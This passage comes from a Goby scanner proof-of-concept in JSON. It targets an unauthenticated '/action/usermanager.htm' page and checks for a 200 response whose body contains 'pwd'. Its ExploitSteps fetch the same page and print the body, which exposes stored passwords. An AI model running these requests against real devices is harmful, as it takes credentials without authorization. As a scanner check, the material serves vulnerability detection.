", 14 | "References": [ 15 | "http://wiki.peiqi.tech" 16 | ], 17 | "HasExp": true, 18 | "ScanSteps": [ 19 | "AND", 20 | { 21 | "Request": { 22 | "method": "GET", 23 | "uri": "/action/usermanager.htm", 24 | "follow_redirect": true, 25 | "header": {}, 26 | "data_type": "text", 27 | "data": "" 28 | }, 29 | "ResponseTest": { 30 | "type": "group", 31 | "operation": "AND", 32 | "checks": [ 33 | { 34 | "type": "item", 35 | "variable": "$code", 36 | "operation": "==", 37 | "value": "200", 38 | "bz": "" 39 | }, 40 | { 41 | "type": "item", 42 | "variable": "$body", 43 | "operation": "contains", 44 | "value": "pwd", 45 | "bz": "" 46 | } 47 | ] 48 | }, 49 | "SetVariable": [] 50 | } 51 | ], 52 | "ExploitSteps": [ 53 | "AND", 54 | { 55 | "Request": { 56 | "method": "GET", 57 | "uri": "/action/usermanager.htm", 58 | "follow_redirect": true, 59 | "header": {}, 60 | "data_type": "text", 61 | "data": "" 62 | }, 63 | "SetVariable": [ 64 | "output|lastbody" 65 | ] 66 | } 67 | ], 68 | "PostTime": "2021-02-21 11:22:17", 69 | "GobyVersion": "1.8.237" 70 | } --------------------------------------------------------------------------------